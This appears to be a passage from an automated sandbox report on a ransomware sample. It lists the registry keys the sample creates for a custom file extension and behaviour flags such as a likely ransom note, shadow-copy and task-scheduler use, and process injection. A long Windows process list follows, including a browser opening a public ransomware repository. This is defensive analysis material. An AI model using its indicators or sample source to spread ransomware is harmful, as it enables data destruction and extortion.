| Key created | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "813" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.KeOBVFSB4\ = "KeOBVFSB4" | C:\Users\Admin\Downloads\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\KeOBVFSB4\DefaultIcon\ = "C:\\ProgramData\\KeOBVFSB4.ico" | C:\Users\Admin\Downloads\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\KeOBVFSB4\DefaultIcon | C:\Users\Admin\Downloads\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "23" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.KeOBVFSB4\ = "KeOBVFSB4" | C:\Users\Admin\Downloads\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.KeOBVFSB4 | C:\Users\Admin\Downloads\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000_Classes\Local Settings\MuiCache | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "23" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.KeOBVFSB4\ = "KeOBVFSB4" | C:\Users\Admin\Downloads\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "56" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.KeOBVFSB4 | C:\Users\Admin\Downloads\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.KeOBVFSB4\ = "KeOBVFSB4" | C:\Users\Admin\Downloads\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\KeOBVFSB4\DefaultIcon\ = "C:\\ProgramData\\KeOBVFSB4.ico" | C:\Users\Admin\Downloads\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "56" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\KeOBVFSB4 | C:\Users\Admin\Downloads\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\KeOBVFSB4\DefaultIcon\ = "C:\\ProgramData\\KeOBVFSB4.ico" | C:\Users\Admin\Downloads\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\KeOBVFSB4\DefaultIcon\ = "C:\\ProgramData\\KeOBVFSB4.ico" | C:\Users\Admin\Downloads\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.KeOBVFSB4\ = "KeOBVFSB4" | C:\Users\Admin\Downloads\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\KeOBVFSB4\DefaultIcon\ = "C:\\ProgramData\\KeOBVFSB4.ico" | C:\Users\Admin\Downloads\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.KeOBVFSB4 | C:\Users\Admin\Downloads\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\KeOBVFSB4\DefaultIcon\ = "C:\\ProgramData\\KeOBVFSB4.ico" | C:\Users\Admin\Downloads\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.KeOBVFSB4 | C:\Users\Admin\Downloads\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
Scheduled Task/Job: Scheduled Task
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: MapViewOfSection
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\ebf8f470ffc1fa2c68fb9674c6e9842f9b5e5a15e2d37b11ffdb1de90d017b92.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\ebf8f470ffc1fa2c68fb9674c6e9842f9b5e5a15e2d37b11ffdb1de90d017b92.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\ebf8f470ffc1fa2c68fb9674c6e9842f9b5e5a15e2d37b11ffdb1de90d017b92.exe | N/A |
| N/A | N/A | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy service COM API
Processes
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p
C:\Windows\system32\fontdrvhost.exe
"fontdrvhost.exe"
C:\Windows\system32\fontdrvhost.exe
"fontdrvhost.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k RPCSS -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe" -ServerName:InputApp.AppX9jnwykgrccxc8by3hsrsh07r423xzvav.mca
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://github.com/Pyran1/MalwareDatabase/tree/master/Ransomware
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8215e46f8,0x7ff8215e4708,0x7ff8215e4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,16318003771006949765,8573786079794170067,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2168 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2144,16318003771006949765,8573786079794170067,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2244 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2144,16318003771006949765,8573786079794170067,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2552 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,16318003771006949765,8573786079794170067,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3444 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,16318003771006949765,8573786079794170067,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3572 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2144,16318003771006949765,8573786079794170067,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4944 /prefetch:8
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2144,16318003771006949765,8573786079794170067,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4944 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,16318003771006949765,8573786079794170067,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5308 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,16318003771006949765,8573786079794170067,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5292 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,16318003771006949765,8573786079794170067,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5616 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,16318003771006949765,8573786079794170067,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5620 /prefetch:1
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,16318003771006949765,8573786079794170067,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5836 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2144,16318003771006949765,8573786079794170067,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=4200 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,16318003771006949765,8573786079794170067,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5604 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2144,16318003771006949765,8573786079794170067,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5988 /prefetch:8
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58\" -spe -an -ai#7zMap30225:190:7zEvent18008
C:\Users\Admin\Downloads\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58\9bae897c19f237c22b6bdc024df27455e739be24bed07ef0d409f2df87eeda58.exe
